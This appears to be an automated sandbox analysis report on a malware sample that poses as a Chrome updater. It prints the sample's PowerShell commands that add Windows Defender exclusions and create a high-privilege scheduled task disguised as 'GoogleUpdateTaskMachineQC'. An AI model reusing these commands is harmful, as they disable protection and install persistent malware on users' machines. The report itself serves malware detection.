Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: h2qWqtD73F.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: h2qWqtD73F.exe

Static file information: File size 5980672 > 1048576

Source: h2qWqtD73F.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x592e00

Source: h2qWqtD73F.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: @C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831* source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct4AB9.tmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct8ACF.tmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp
Source:	Binary string: (@C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb*6 source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wz.pdB source: h2qWqtD73F.exe, 00000000.00000002.1416245582.00000200354F0000.00000004.00000001.00020000.00000000.sdmp, h2qWqtD73F.exe, 00000000.00000000.1297247842.00007FF752A5B000.00000008.00000001.01000000.00000003.sdmp, h2qWqtD73F.exe, 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmp, updater.exe, 00000014.00000000.1417205334.00007FF6DD49B000.00000008.00000001.01000000.00000008.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.error source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A583109edcd source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831~1 source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbF source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.error source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wz.pdBk source: h2qWqtD73F.exe, 00000000.00000002.1416245582.00000200354F0000.00000004.00000001.00020000.00000000.sdmp, h2qWqtD73F.exe, 00000000.00000000.1297247842.00007FF752A5B000.00000008.00000001.01000000.00000003.sdmp, h2qWqtD73F.exe, 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmp, updater.exe, 00000014.00000000.1417205334.00007FF6DD49B000.00000008.00000001.01000000.00000008.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831d0 source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbl source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Unpacked PE file: 20.2.updater.exe.28471390000.1.unpack

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
